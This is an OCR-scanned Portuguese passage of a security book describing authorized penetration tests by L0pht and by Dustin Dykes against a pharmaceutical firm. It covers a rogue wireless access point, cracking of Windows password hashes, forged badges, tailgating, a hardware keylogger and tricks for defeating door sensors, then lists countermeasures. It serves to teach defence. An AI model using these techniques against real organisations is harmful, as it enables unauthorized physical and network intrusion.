empresa nao tinha ideia do que esperar; a equipe da 1 Opht sabia que seria uma reuniao incendiaria. 

Entao, entregamos a eles o relatório, de uma maneira bem aberta. E eles ficaram constrangidos. 

O marayilhoso administrador de sistemas, um cara realmente legał, pode ser visto com os 
sniffers tentando entrar num dos roteadores, tentando uma senha e fracassar, tentando outra e 
fracassar, outra e fracassar de novo. 

Essas eram as senhas do administrador para todos os diferentes sistemas intemos, as quais foram 
conseguidas pelo pessoal que efetuou os pen tests imediatamente, naquele interyalo de poucos minutos. 
Mudge se lembra de como aquilo foi tranqiiilo e facil. 

A parte mais interessante foi ouvir um dos yoicemails no qual eles estayam falando do interesse 
de nos comprar- Eles nos diziam: "Sim, ąueremos voces todos, caras*. Mas nos yoicemails 
trocados entre eles falayam: "Bem, ąueremos Mudge, mas nao ąueremos aąueles outros; vamos 
demiti-los assim que eles entrarem". 

Na reuniao, a equipe da lOpht mostrou algumas das mensagens captadas de yoicemail enquanto os 
executivos permaneciam sentados, ouvindo suas próprias palavras, constrangidos. Mas o melhor ainda estava 
por vir. Mudge tinha programado uma sessao finał de negociaęóes sobre a compra que deveria ocorrer junto 
com a reuniao de entrega do relatório. Ele falou dos detalhes daquele encontro com euforia. 

Entao eles vem e dizem: "Estamos dispostos a lhe dar isso, e o maximo que podemos oferecer, e 
faremos todas essas coisas". Mas sabemos exatamente que parte do que estao dizendo e yerdade 
e que parte nao e. 

Eles comeęam com essa oferta baixa, E arriscam-se a perguntar: "0 que voces acham?". E 
rebatemos: "Bem, nao achamos que podemos fazer por menos de...", e mencionamos o 
montante que sabiamos que era a cifra mais alta deles. 
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E dizendo algo como: "Ah, bem, teremos de conversar sobre isso, voces nos dao alguns minutos? Podem 
sair da sala por um momento?". 

Nao fosse por esse tipo de coisa, teriamos pensado muito seriamente no assunto. Mas eles estavam 
tentando ganhar tempo. 

Na reuniao de apresentaęao do relatório, na sessao finał entre os representantes das duas empresas, Mudge lembra 
que "só ąueriamos nos certificar de que poderiamos convence-los de que nao havia sequer uma maquina na rede a 
qual nao pudessemos ter pleno acesso". Carlos lembra que varios executivos "ficaram vermelhos" enquanto ouviam. 
No finał, a equipe lOpht foi embora, Eles ficaram com os 15 mil dólares, mas nao venderam a empresa daquela 

vez. 

Um jogo alarmante 

Para Dustin Dykes, consultor de seguranęa, hacking por lucro e "empolgante. Entendo os viciados em adrenalina, 
e uma euforia total". Entao, quando ele chegou a sala de conferencia de uma empresa farmaceutica, que chamaremos 
de 'Biotech', para discutir a realizaęao de um pen test para eles, estava de bom humor e avido por enfrentar o desafio. 

Como principal consultor da pratica de servięos de seguranęa de sua empresa, a Callisma, Inc. (agora parte da 
SBC), Dustin convocou sua equipe para participar da reuniao, com todos vestidos de terno. Ele foi pego de surpresa 
quando o pessoal da Biotech apareceu de jeans, camisa póło e short, o que parecia muito estranho, levando-se em 
conta que, na epoca, Boston estava passando por um dos invemos mais rigorosos da historia. 

Apesar de ter formaęao em administraęao de computadores, em especial operaęoes de rede, Dustin sempre se 
considerou uma pessoa da seguranęa, uma postura que provavelmente desenvolveu enquanto fazia uma visita a Foręa 
Aerea, onde, diz ele: "Cultivei minha paranóia latente: a mentalidade de seguranęa de que todos estao atras de voce", 
Seu envolvimento com computadores na setima serie foi por influencia de sua madrasta. Naquela epoca, ela 
trabalhava como administradora de sistemas para uma empresa. Dustin ficou fascinado por aquela linguagem estranha 
que ela usava quando conversava sobre negócios ao telefone. Quando ele tinha 13 anos, "uma noite ela trouxe para 
casa um computador que eu levei para meu quarto e programei para criar personagens Dungeons and Dragons ej ogar 
os dados para mim". Mergulhado em livros sobre Basic e pegando tudo o que podia obter de amigos, Dustin 
desenvolveu suas habilidades. Aprendeu sozinho como usar um modem para discar para o local de trabalho de sua 
madrasta para jogar games de aventura. No inicio ele só queria passar mais tempo no computador, mas, quando 
cresceu, percebeu que, com seu espirito livre, nao se daria bem em frente de um terminal a vida toda. Como consultor 
de seguranęa, ele podia combinar seus talentos com sua necessidade de liberdade. Essa foi, sem duvida, "uma soluęao 
inteligente". 

A decisao de fazer carreira na area de seguranęa foi boa. "Fico empolgado por estar nessa profissao", diz ele. "E 
um jogo de xadrez. Para cada movimento ha um contramovimento. E cada movimento muda toda a dinamica do 
jogo." 
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Regras de engajamento 

Faz sentido toda empresa preocupar-se com sua vulnerabilidade — como protege sua propriedade 
intelectual, como se protege contra a falta de credibilidade decorrente, inevitavelmente, de urna invasao 
bastante diwlgada na midia, como resguarda seus funcionarios contra inyasores eletrónicos que ąuerem 
olhar suas informaęoes pessoais. 

Algumas empresas sao motivadas por razoes ate mais seria, como nao entrar em conflito com agencias 
govemamentais, o que poderia significar a perda de um contrato importante ou causar um atraso crucial num 
projeto de pesquisa. Qualquer empresa que tenha um contrato com o Departamento de Defesa se enquadra 
nessa categoria, como tambem qualquer empresa envolvida cm pesquisa sigilosa de biotecnologia ou que 
esteja sendo fiscalizada pela Food and Drug Administration — categoria em que se incluia a nova cliente da 
Callisma, Com produtos quimicos perigosos e laboratórios onde os cientistas conduziam pesquisas sobre as 
quais os hackers contratados nao tinham o menor interesse, essa missao seria desafiadora. 

Na reuniao inicial com a Biotech, a equipe da Callisma percebeu que a empresa queria que fossem 
simulados todos os ataques possiveis de serem feitos por um adversario verdadeiro» simples ou complexos, 
engenharia social e invasoes fisicas. Os executivos de TI da empresa, como frequentemente e o caso, 
estavam certos de que os realizadores do pen test veriam todos os seus esforęos darem em nada. Entao, a 
Biotech estabeleceu suas regras: só seriam aceitas sólidas evidencias documentais. 

Um processo 'parar e desistir' foi estabelecido para o teste. As vezes isso pode ser tao simples quanto 
urna palavra-código previamente combinada vinda de qualquer funcionario designado para deter um ataque 
que esteja afetando negativamente o trabalho da empresa. A empresa tambem deu orientaęoes relativas a 
conduęao de informaędes comprometedoras — como seriam resguardadas, quando seriam repassadas c para 
quem. 

Urna vez que o pen test oferece a possibilidade de contextos que podem interferir no trabalho da empresa, 
varias situaęoes hipoteticas tambem devem ser previstas. Quem na hierarquia de comando sera avisado caso 
haja interferencia em um trabalho? Exatamente que partes do sistema podem ser comprometidas e como? E 
como os realizadores do teste sabem ate que ponto um ataque pode ser executado antes de ocorrerem danos 
irreparaveis ou perdas na empresa? 

Os clientes frequentemente solicitam apenas um pen test que envolva um ataque tecnico e ignoram outras 
ameaęas que podem deixar a empresa ainda mais vulneravel. Dustin Dykes explica: 

Independentemente do que eles dizem, eu sei que o objetivo basico e identificar pontos fracos de 

seu sistema, mas de modo geral eles estao vulneraveis de outras maneiras. Um verdadeiro 

atacante seguira o caminho de menor resistencia, o link mais fraco na cadela de seguranęa. 

Como agua correndo pela montanha, o atacante vai seguir o metodo mais tranqiiilo, o que e 

mais comum entre as pessoas. 

Os ataques de engenharia social, Dustin aconselha» devem sempre fazer paire do pen test de urna 
empresa. (Para saber mais sobre engenharia social, ver o Capitulo 10.) 
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Mas de ficaria contente de pular outra parte do teste. Se nao precisar tentar entrar no edificio, nao fara 
isso. Para ele, esse e o ultimo recurso, mesmo portando seu cartao de passe livre da prisao. "Se alguma coisa 
der errado, provavelmente sera ąuando estiver tentando entrar num edificio sem ser notado pelos seguranęas 
ou por algum funcionario desconfiado." 

Finalmente, a eąuipe de pen test tambem precisa saber qual e o Santo Graal. Nesse jogo muito arriscado 
de investigaęao eletrónica, e vital saber isso. Para a industria farmaceutica, o Santo Graal eram seus registros 
fmanceiros, seus clientes, seus fomecedores, seus processos de manufatura e seus arquivos sobre projetos de 
P&D. 

Planejando 

O piano de Dustin para o teste exigia que ele comeęasse com o chamado 'running silenf. ou seja, 
funcionando silenciosamente: manter pouca visibilidade e se tomar, pouco a pouco, cada vez mais visivel, 
ate que alguem acabasse notando e levantasse a bandeira. Essa abordagem nasce da filosofia de Dustin sobre 
projetos pen test, aos quais ele se refere como trabalho em eąuipe. 

O que tento realizar nos trabalhos em eąuipe provem da postura defensiva que vejo as 
empresas assumindo. Eles pensam: "Vamos assumir o modo de pensar do atacante. Como nos 
defenderiamos contra ele?". Isso ja e um golpe contra eles, que nao sabem como vao agir ou 
reagir, a menos que tenham consciencia do que e importante para si. 

Concordo. Como Sun Tzu escreveu: "Conhece teu inimigo e a ti mesmo, e seras vitorioso". Todos os pen tests 
completos — ąuando o cliente concorda — usam os mesmos tipos de ataque descritos neste capitulo. 

Identificamos quatro areas em nossa metodologia: entrada tecnica na rede, que trata em 
grandę parte do que falamos; engenharia social, [que para nos tambem inclui] escutar 
secretamente e o surfe de ombro; 'virar latas', e tambem a entrada flsica. Entao, essas sao as 
quatro areas. 

{Surfe de ombro e urna expressao interessante usada para se referir a obseryaęao clandestina da senha de 
um funcionario no momento em que ele a digita. Um atacante habil nessa arte aprendeu a observar os dedos 
com cuidado suficiente para saber o que a pessoa digitou, mesmo fmgindo nao estar prestando atenęao.) 

Ataque! 

No primeiro dia, Dustin entrou no saguao da Biotech. A direita da guarita havia um banheiro e o 
refeitório da empresa, ambos acessiveis aos visitantes. Do outro lado da guarita estava a mesma sala de 
conferencia onde a eąuipe de Dustin tinha se reunido para seu primeiro encontro com os executivos da 
Biotech. O guarda estava posicionado no centro para yigiar o acesso a entradas seguras, mas a sala 
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de conferencia estava completamente fora da visao dele. Qualquer um podia entrar la sem ser ąuestionado. E foi 
exatamente isso que Dustin e seu colega de equipe fizeram. E entao eles tiveram muito tempo para olhar a vontade o 
local. Afinal, ninguem nem sabia que eles escavam la. 

Eles descobriram urna tornada de rede ativa, presumivelmente instalada para a comodidade do pessoal da 
empresa que quisesse acessar a rede corporativa durante reunioes. Ligando o cabo Ethernet de seu laptop na tornada, 
Dustin logo descobriu o que esperava: obteve acesso a rede de tras do firewall da empresa, o que era um convite 
aberto para entrar no sistema da empresa. 

Em urna cena que deveria ter como trilha sonora a do filme Missao impossivel, Dustin ajustou na parede um 
pequeno dispositivo de acesso sem fio (como o da Figura 6.1) e o plugou na tornada. O dispositivo permitiria que o 
pessoal de Dustin penetrasse na rede da Biotech de computadores de um carro ou de urna van estacionada perto, mas 
fora da empresa. Transmissoes de um dispositivo com 'ponto de acesso sem fio' (WAP) podem alcanęar distancias de 
ate cem metros. O uso de urna amena direcional high-gain permite conectar-se ao WAP escondido de urna distancia 
ainda maior. 

Dustin gosta de unidades de acesso sem fio que operam em canais europeus, as quais dao a sua equipe pen urna 
vantagem decisiva, urna vez que e muito mais dificil detectar as frequencias. Alem disso, o dispositivo "nao se parece 
com um ponto de acesso sem fio, por isso nao chama a atenęao das pessoas. Eu o deixei la durante um mes sem que 
ninguem o notasse nem o desativasse". 

Quando instala urna dessas unidades, Dustin tambem coloca um cartao que parece oficial com 

um aviso dizendo: "Propriedade do Servięo de Seguranęa de Informaęoes, Nao remova". 

Com a temperatura a sete graus negativos, nem Dustin nem seus colegas de equipe, agora usando jeans e camisa 
póło para combinar com a imagem da Biotech, queriam que seus traseiros congelassem sentados num carro parado no 
estacionamento. Entao, eles gostaram da oferta feita pela Biotech de usarem urna pequena sala em urna area sem 
seguranęa de um edificio próximo. Nao era nada bonita, mas era aquecida e no alcance do dispositivo sem fio. Eles 
estavam conectados — para a empresa, conectados ate demais. 

Quando a equipe comeęou a explorar a rede da Biotech, a tentativa inicial de reconhecimento localizou 
aproximadamente quarenta maquinas que executavam Windows que tinham urna conta administrativa sem senha, ou 
com urna senha de senha. Em outras palavras, eles nao dispunham de seguranęa nenhuma, o que, infelizmente, como 
foi notado em histórias anteriores, e o caso de redes corporativas: elas se concentram nos controles de seguranęa do 
perimetro para manter os caras perigosos do lado de fora, mas deixam os hosts do lado de dentro vulneraveis a 
ataques. Um atacante que encontra urna maneira de penetrar ou de contomar um firewall esta em casa. 

Depois de comprometer urna daquelas maquinas, Dustin extraiu todos os hashes de senha de todas as contas e fez 
esse arquivo passar pelo programa lOphtCrack. 



Figura 6.1: Dispositivo sem fio do tipo usado no atague. 
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lOphtCrack em funcionamento 

Numa maąuina Windows, senhas de usuarios sao armazenadas de forma criptografada (um 'hash') em 
urna area chamada Security Accounts Manager (SAM). As senhas nao sao apenas criptografadas, mas isso e 
feito de um modo ininteligivel, conhecido como 'one-way hash', o que significa que o algoritmo 
criptografado converte a senha de texto em sua forma criptografada, mas nao pode converter a forma 
criptografada em texto novamente. 

O sistema operacional Windows armazena duas vers5es do hash no SAM. Urna delas, o 'LAN Manager 
hash', ou LANMAN, e urna versao antiga, um legado dos dias pre-NT. O LAN MAN hash i computado da 
versao com caracteres maiusculos da senha do usuario e dividido em duas metades de sete caracteres cada. 
Devido as suas propriedades, esse tipo de hash e muito mais facil de violar que seu sucessor, o NT LAN 
Manager (NTLM), que, entre outras caracteristicas, nao converte a senha para caracteres maiusculos. 

Como ilustraęao, ve-se a seguir um hash real de um administrador de sistema de urna empresa cujo nome 
nao vou revelar; 

Administrator:500:AA33FDF289D20A799FB3AF221 F3220DC:0ABC818FE0 
5A120233838B9131F36BB1::: 

A seęao entre dois pontos, que comeęa com 'AA33' e termina com '20de', e o hash LANMAN. A seęao de 
'OABC' a '6BB1' e o hash NTLM. Ambos tern 32 caracteres e representam a mesma senha, mas o primeiro e 
muito mais facil de violar e de recuperar a senha de texto. 

Urna vez que a maioria dos usuarios escolhe urna senha que e um nome ou urna simples palavra de 
dicionario, um atacante geralmente comeęa instalando lOphtCrack (ou o programa que esta usando) para 
efetuar um 'ataque de dicionario' — testando cada palavra do dicionario para descobrir se alguma e a senha 
do usuario. Se o programa nao tiver sucesso com o ataque do dicionario, o atacante entao comeęara um 
'ataque foręa-bruta', em que o programa tenta toda combinaęao possivel (por exemplo, AAA, AAB, AAC ... 
ABA, ABB, ABC, e assim por diante) e entao verifica combinaęoes que incluem letras maiusculas, 
minusculas, numerais e simbolos. 

Um programa eficiente como o lOphtCrack pode violar senhas simples, diretas (do tipo que talvez 90 por 
cento da populaęao use) em segundos. O tipo mais complicado pode levar horas ou dias, mas quase todas as 
senhas de conta acabam sucumbindo. 

Acesso 

Dustin logo violou a maioria das senhas. 

Tentei entrar no controlador primario de dominio com a senha [do administrador] e funcionou. 

Eles usaram na maquina local a mesma senha que usaram na conta de dominio. Agora eu tenho 

direitos de administrador sobre o dominio inteiro. 

Um controlador primario de dominio (PDC) mantem o banco de dados master de contas de usuarios de 
dominio. Quando um usuario entra no dominio, o PDC autentica a solicitaęao de 
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conexao com a informaęao armazenada no banco de dados do PDC. Esse banco de dados master de contas tambem e 
copiado para o de backup do controlador de dominio (BDC) como precauęao, caso o PDC caia. Essa arąuitetura tern 
sido substancialmente mudada com o lanęamento do Windows 2000. As versoes mais recentes do Windows usam o 
que e chamado Active Directory, mas. por compatibilidade com as versoes mais antigas, ha pelo menos um sistema 
que atua como PDC para o dominio. 

Ele tinha as chaves do reino da Biotech e conseguiu acesso a varios documentos intemos rotulados como 
'confidencial' ou 'apenas para uso interno'. Trabalhando intensamente, Dustin levou horas reunindo informaęoes 
sigilosas de arquivos de seguranęa altamente confidenciais sobre drogas, que contem informaęoes detalhadas sobre 
possiveis efeitos prejudiciais causados pelos produtos farmaceuticos que a empresa estava estudando. Em virtude da 
natureza do negócio da Biotech, o acesso a essas informaęoes e controlado estritamente pela Food and Drag 
Administration, e o sucesso do pen test precisaria estar sujeito a um relatório formal para aquela agencia. 

Dustin tambem obteve acesso ao banco de dados do funcionario, descobrindo nome completo, conta de e-mail, 
numero de telefone, departamento, posięao e assim por diante. Usando essas informaęoes. conseguiu selecionar um 
alvo para a próxima fasę de seu ataque, A pessoa que ele escolheu era um administrador de sistemas da empresa 
responsavel pela supervisao do pen test. "Embora eu ja tivesse muita informaęao sigilosa, queria mostrar que havia 
varios vetores de ataque", o que significa mais do que urna maneira de comprometer informaęoes. 

A equipe da Callisma percebeu que, se voce quer entrar numa area segura, nao ha modo melhor do que se 
misturar a um grapo de funcionarios falantes que voltam do almoęo. Nos periodos da manha e da noite, as pessoas 
podem estar cansadas e irritadas, mas depois do almoęo elas tendem a estar menos vigilantes, talvez se sentindo um 
pouco desanimadas enquanto seu sistema digestório digere a refeięao. A conversa e amigavel, e a camaradagem e 
repleta de pistas que fluem livremente* A artimanha predileta de Dustin e notar quando alguem esta se preparando 
para sair do refeitório. Ele se adianta ao alvo, segura a porta para a pessoa e entao a segue. Nove entre dez vezes — 
embora isso conduza a urna area de seguranęa — o alvo age reciprocamente, segurando gentilmente a porta para ele. 
E ele esta la dentro, sem suar. 

Alarmado 

Depois de selecionado o alvo, a equipe precisava imaginar um modo de entrar fisicamente na area de seguranęa, 
de maneira que pudesse conectar um keystroke logger ao computador do alvo — um dispositivo que gravaria toda 
tecla digitada no teclado, mesmo aquelas digitadas num startup, antes de um sistema operacional ser carregado. Na 
maquina de um administrador de sistema. isso provavelmente interceptaria senhas de varios sistemas na rede. Poderia 
tambem significar que aqueles que realizam o pen test partilhariam secretamente mensagens sobre qualquer esforęo 
para detectar suas faęanhas. 

Dustin estava determinado a nao arriscar ser pego nessa operaęao. Era necessario fazer urna pequena engenharia 
social. Com livre acesso ao lobby e ao refeitório, ele deu urna boa olhada nos crachas dos funcionarios e falsificou um 
para si. O logo nao era problema — ele simplesmente o copiou do site Web da empresa. E, com certeza, ele nao iria 
passar por um exame detalhado. 
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Um conjunto de escritórios da Biotech estava localizado num edificio próximo, uma instalaęao 
compartilhada com escritórios alugados para varias empresas diferentes. O saguao de entrada tinha um 
guarda, inclusive a noite e nos fms de semana, e um leitor de cartao que destravava a porta do saguao 
ąuando um funcionario passava um cracha com a codificaęao eletrónica correta. 

Vou la no fim de semana, comeęo a passar o cracha falso que fiz. Estou passando o 
cracha pela leitora eletrónica e evidentemente nao funciona. O seguranęa vem, abre a 
porta e sorri. Eu sorrio e passo facilmente por ele. 

Sem trocar uma palavra, Dustin passou pelo guarda e entrou na area de seguranęa. Mas os escritórios da 
Biotech ainda estavam seguros atras de outra leitora. Nao havia movimento nenhum no edificio no fim de 
semana. 

Nao ha ninguem no lim de semana para eu poder entrar junto. Entao, tentando encontrar um 
meto alternativo de entrar, subo uma escada protegida por vidro ate o segundo piso e tento 
abrir a porta para ver se ela abre ou nao. Eu a abro, nao e necessario o cracha. 

Mas os alarmes estao disparando por toda parte. Aparentemente, estou entrando no que e uma 
saida, no caso de incendio. Entro, a porta bate atras de mim. Do lado de dentro ha uma płaca: 
"Nao abra, o alarme soara". Meu coraęao bate a 150 por minuto. 

O fantasma 

Dustin sabia exatamente aonde ąueria ir. O banco de dados do funcionario que a equipe tinha 
comprometido indicava o lugar onde ficava cada um deles. Com o alarme ainda tocando, ele foi para a baia- 
alvo. 

Um atacante pode capturar as teclas digitadas em um computador instalando um software que grava cada 
tecla digitada e periodicamente envia os dados por e-mail a um endereęo especifico. Mas, determinado a 
mostrar ao cliente que eles eram vulneraveis e poderiam ser invadidos de diversas maneiras, Dustin queria 
usar um meio fisico para fazer a mesma coisa. 

O dispositivo que ele escolheu para esse propósito foi o Keyghost (ver Figura 6.2). Trata-se de um objęto 
aparentemente inocente que se conecta entre o teclado e o computador e, devido ao seu tamanho pequeno, e 
praticamente garantido que passe despercebido. Um modelo pode guardar meio milhao de teclas digitadas, o 
que para o usuario de computador tipico representa semanas de 



Figura 6.2: O logger de teclas Keyghost. 
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digitaęao. (Ha uma desvantagem, no entanto. O atacante precisa voltar ao local ąuando for hora de recuperar 
o logger e ler os dados.) 

Dustin levou somente segundos para puxar o cabo do teclado do computador, conectar o Keyghost e 
reconectar o cabo. Ele pensava fazer tudo rapidamente porąue "estou supondo que o volume do alarme 
aumente, o tempo esta se esgotando, minhas maos estao ligeiramente tremulas. Vao me pegar. Eu sei que 
nao vai acontecer nada de mau comigo porque tenho o cartao 'passe livre da prisao', mas mesmo assim a 
adrenalina e grandę, sem duvida". 

Assim que o Keyghost foi instalado, Dustin saiu pela escada principal, que o levava para perto da 
guarita. Utilizando outra dose de engenharia social, ele enfrentou o problema corajosamente. 

Eu sai propositadamente pela porta que estava ao lado do seguranęa. Em vez de tentar evita-lo 

ao sair, fui direto ate [o guarda] . Disse: "Puxa, sinto muito por ter disparado o alarme, fui eu. 

Eu nunca entro neste edificio, nao pensei que isso ia acontecer, quero realmente me desculpar". 

E o guarda disse: "Ah, nao tem problema". Entao ele pegou o telefone. imagino que tenha 

ligado para alguem quando o alarme disparou e agora estava Ugando para dizer: "Alarme 

falso, tudo bem". Nao fiquei por perto para ouvir. 

Sem questionamentos 

O pen test estava chegando ao firn, Os executivos de seguranęa da empresa estavam superconfiantes em 
que os realizadores nao conseguiriam penetrar na rede nem ganhar acesso fisico nao autorizado aos edificios; 
no entanto, nenhum membro da equipe tinha sido questionado. Dustin foi aumentando devagar o 'nivel de 
ruido', tornando sua presenęa cada vez mais evidente. Ainda nada. 

Curiosos por saber ate onde podiam se safar, varios membros da equipe conseguiram acesso as 
dependencias da empresa fazendo tailgating (entrando junto com outros funcionarios), levando uma enorme 
antena, uma geringonęa, na cara de todos, que exigia um yerdadeiro esforęo para carregar. Alguns 
funcionarios certamente notariam esse dispositivo bizarro, iriam querer saber o que era e botariam a boca no 
mundo. Entao, sem crachas, a equipe perambulou primeiro por um dos edificios seguros da Biotech e depois 
pelos outros, por tres horas. Ninguem lhes dirigiu uma unica palavra. Ninguem fez uma unica pergunta 
como: "O que e isso?". A reaęao mais forte veio de um seguranęa que passou por eles num corredor, olhou- 
os de maneira estranha e continuou andando sem dar maiores atenęoes ao caso. 

A equipe da Callisma concluiu que, como na maioria das organizaędes, qualquer um viria da rua, 
carregaria seu equipamento, andaria pelos edificios e nunca seria parado nem para dar explicaęoes, nem para 
mostrar autorizaęao. Dustin e seus colegas de equipe chegaram a extremos sem serem questionados. 

O truque do aquecedor de mao 

A solicitaęao de saida (REX, do ingles Request to Exit) e um recurso comum em varias dependencias de 
empresas como a Biotech. Dentro de uma area de seguranęa, como o laboratório de 
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pesquisa, quando alguem se aproxima de uma porta para sair, o corpo dispara um sensor de calor ou movimento 
que libera a trava e impede a saida da pessoa; se estiver carregando, digamos, um suporte para tubos de ensaio 
ou empurrando um carrinho cheio, nao e necessario parar e manusear desajeitadamente um dispositivo de 
seguranęa para que a porta se abra. de fora da sala, para entrar, voce deve passar um cracha autorizado pelo 
leitor de cartao ou pressionar um código de seguranęa num teclado. 

Dustin notou que inumeras portas com esse dispositivo na Biotech tinham uma abertura embaixo. Ele queria 
saber se poderia obter acesso enganando o sensor; se, do lado de tora da porta, ele pudesse simular o calor ou o 
movimento de um corpo humano no lado de dentro da sala, talvez conseguisse abrir a porta. 

Eu comprei alguns aąuecedores de mao, daquele tipo que voce compra em qualquer loja 

de suprimentos. Normalmente, voce os coloca nos bolsos para manter as maos aquecidas. 

Eu deixo um ficar aquecido, entao o engancho num arame duro, que passo por baixo da 

porta, e comeęo a levanta-lo ate o sensor, movendo-o para a frente e para tras. 

Certamente, enganou a trava. 

Outra medida de seguranęa considerada normal tinha acabado de falhar. 

No passado, fiz uma coisa parecida. O truque com o ripo de dispositivo de controle de acesso que detecta 
movimento em vez de calor consiste em empurrar um balao sob a porta, segura-lo pela abertura, enche-lo com 
helio e amarra-lo na poma com um barbante, deixando-o flutuar perto do sensor e manipulando-o. Do mesmo 
modo que o aquecedor de mao de Dustin, com um pouco de paciencia o balao faria o truque. 

Fim de teste 

As luzes da Biotech estavam acesas, mas nao havia ninguem presente. Embora os executivos de Tl da 
empresa alegassem que estavam executando sistemas de detecęao de invasao e mesmo produzissem varias 
licenęas para a detecęao de invasao baseada em host, Dustin acredita que os sistemas ou estavam desligados ou 
realmente nao havia ninguem verificando os logs. 

Com o projeto chegando ao fim, o Keyghost tinha de ser recuperado da mesa do administrador de sistema. Ele 
permaneceu no local por duas semanas sem ser notado. Como o dispositivo estava localizado em uma das areas 
mais dificeis de se fazer tailgate, Dustin e um colega de equipe chegaram apressados do almoęo e correram para 
pegar a porta e mante-la aberta, como se estivessem sendo gentis, enquanto um funcionario passava. Finalmente, 
pela primeira e unica vez, eles foram questionados. O funcionario perguntou se eles tinham crachas. Dustin pós a 
mao na cintura e mostrou seu cracha falso, o que pareceu satisfize-lo. Eles nao pareciam com medo nem 
constrangidos, e o funcionario prosseguiu, permitindo-lhes entrar sem maiores questionamentos. 

Depois de ter acesso a area de seguranęa, eles entraram na sala de conferencia. Na parede havia um grandę 
quadro branco com palavras familiares escritas nele. Dustin e seu colega perceberam que eles estavam na sala 
onde a Biotech fazia suas reunioes de Tl de seguranęa, uma sala onde a empresa 
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sem duvida nao ąueria que eles estivessem. Naąuele momento, o seguranęa entrou e pareceu chocado ao 
encontra-los la. Balanęando a cabeęa, perguntou o que eles estavam fazendo- Enquanto isso, outro pessoal 
da seguranęa da Biotech estava chegando a sala de reuniao, inclusive o funcionario que eles tinham usado 
para tailgate na porta de entrada do ediflcio. 

Ele nos viu e disse ao responsayel: M Ah, eu gostaria que voce soubesse que os interpelei ao 
entrarem". Ele na verdade estava orgulhoso por ter nos questionado. Constrangimento e o que 
ele deveria ter sentido, porque a unica pergunta que fez nao foi o suficiente para descobrir se 
podiamos estar la. 

O supervisor cuja mesa foi manipulada com o Keyghost tambem chegou para a reuniao. Dustin 
aproveitou a oportunidade e foi ate a baia dele para pegar seu hardware. 

Olhando para tras 

Em um momento, durante o teste, certos de que alguem iria notar, Dustin e a equipe tinham, 
corajosamente, escaneado toda a rede da empresa, de ponta a ponta. Nao houve urna unica resposta a esse 
procedimento invasivo. Apesar de comportamentos que Dustin descreve como 'gritos e berros', o pessoal do 
cliente nunca notou nenhum dos ataques. Nem mesmo os escaneamentos 'barulhentos' de rede para 
identificar qualquer sistema potencialmente vulneravel foram notados. 

No firn, estayamos executando escaneamentos que ocupayam enorme espaęo de banda larga da 
rede. Era quase como se estiyessemos dizendo: M Ei, peguem-nos!". 

A equipe ficou surpresa ao saber o quanto a empresa parecia ser insensivel, embora soubesse muito bem 
que aqueles que faziam os pen tests fariam de tudo para invadir. 

No finał do teste deveria haver sinos, assovios, gritos, berros e agitaęao. Nada! Nem 
urna unica bandeira leyantada. 

Foi muito diyertido, Foi o meu teste fayorito. 


Qualquer um que tenha curiosidade sobre a etica de um consultor de seguranęa, cujo trabalho exija 
adentrar lugares (tanto no sentido literał quanto no figurado) vedados a urna pessoa de fora, achara as 
tecnicas de Mudge e Dustin Dykes esclarecedoras. 

Enquanto Mudge usou apenas metodos tecnicos no ataque que descreveu, Dustin usou engenharia social 
tambem. Mas ele nao se sentia bem fazendo isso. Ele nao ficava apreensivo com os aspectos tecnicos do 
trabalho e admite ter aproveitado cada momento dele. Mas quando tinha de enganar as pessoas cara a cara, 
ele se sentia mai. 
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Eu estava tentando racionalizar por que isso acontece. Por que um me desmonta e o outro nao causa 

nada? Talvez sejamos educados a nao mentir para as pessoas, mas nao nos ensinam etica de 

computador. Eu concordaria que geralmente ha menos vergonha quando se engana uma maquina do 

que quando se engana um homem. 

Contudo, apesar de suas apreensoes, ele sente a adrenalina correr em seu sangue sempre que apela para um leve 
truąue de engenharia social. 

Quanto a Mudge, acho fascinante que, embora ele tivesse escrito uma ferramenta muito usada para violar senhas, 
em outras areas ele conta com metodos que fazem parte do arsenał dos hackers de toda parte. 

Medidas preventivas 

Mudge identificou uma regra-padrao de firewall que permitia a entrada de conexoes de qualquer porta alta TCP 
ou UDP (acima de 1024) de qualquer pacote que tivesse uma porta fonte de 53, que e a porta para o DNS. Explorando 
essa configuraęao, ele conseguiu se comunicar com um servięo no computador-alvo que eventualmente lhe permitiu 
acesso a um mount automatico, o que possibilitou que um usuario montasse remotamente um sistema de arquivos. 
Fazendo isso, ele conseguiu acesso ao sistema, explorando uma fraqueza no NFS (sistema de arquivo de rede), e teve 
a disposięao informaęoes sigilosas. A medida preventiva e rever cuidadosamente todas as regras de firewall para 
assegurar que sejam consistentes com a politica de seguranęa da empresa. Durante esse processo, lembre-se de que 
qualquer um pode enganar facilmente uma porta fonte. Como tal, o firewall deveria ser configurado para permitir 
conectividade somente a servięos especificos quando baseia a regra no numero da porta fonte. 

Como foi mencionado em outra parte neste livro, e muito importante garantir que tanto os diretórios quanto os 
arquivos tenham permissoes apropriadas. 

Depois que Mudge e seus colegas foram bem-sucedidos no hack do sistema, eles instalaram programas sniffer 
para captar nomes e senhas de login. Uma medida preventiva efetiva seria usar programas baseados em protocolos 
criptograficos, como o ssh. 

Muitas organizaęoes terao politicas relativas a senhas ou outras credenciais de autenticaęao para acessar sistemas 
de computador, mas nao tern nada em PBX ou sistemas de voicemail. Neste caso, a equipe lOpht violou facilmente 
varias senhas de voicemail pertencentes aos principais executivos da empresa, que estavam usando senhas-padrao 
tipicas, como 1111, 1234, ou o numero do ramal de telefone. A medida preventiva óbvia e exigir que sejam 
instaladas senhas razoavelmente seguras no sistema de voicemail. (Incentive os funcionarios a nao usar em seu pin 
ATM!*) 

Para computadores com informaęoes sigilosas, o metodo descrito neste capitulo para construir senhas por meio de 
caracteres especiais nao-impressos, criados com o Num Fock, <Alt> e o teclado numerico, e altamente recomendado. 

Dustin conseguiu andar livremente pela sala de conferencias da Biotech, pois ela estava localizada numa area 
publica. A sala tinha tomadas ativas de rede que se ligavam a rede interna da empresa. 

* Tecnologia utilizada nas transaęoes com cartao de credito (N. da R. T.). 
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As empresas deveriam desativar essas tomadas de rede ate que fossem necessarias ou separar a rede de modo que a 
rede interna nao fosse acessivel de areas publicas. Outra possibilidade seria um sistema de autenticaęao front-end 
que exigisse um nome de conta valido e urna senha antes de permitir a comunicaęao. 

Urna maneira de atenuar ataques de tailgating e modificar o que os psicólogos sociais chamam de norma de 
educaęao. Com treinamento adequado, o pessoal da empresa supera o desconforto que muitos de nos sentimos em 
questionar outra pessoa, como acontece frequentemente quando se entra num edificio ou area de trabalho por urna 
entrada segura. Funcionarios treinados de modo adequado saberao como questionar educadamente sobre o cracha 
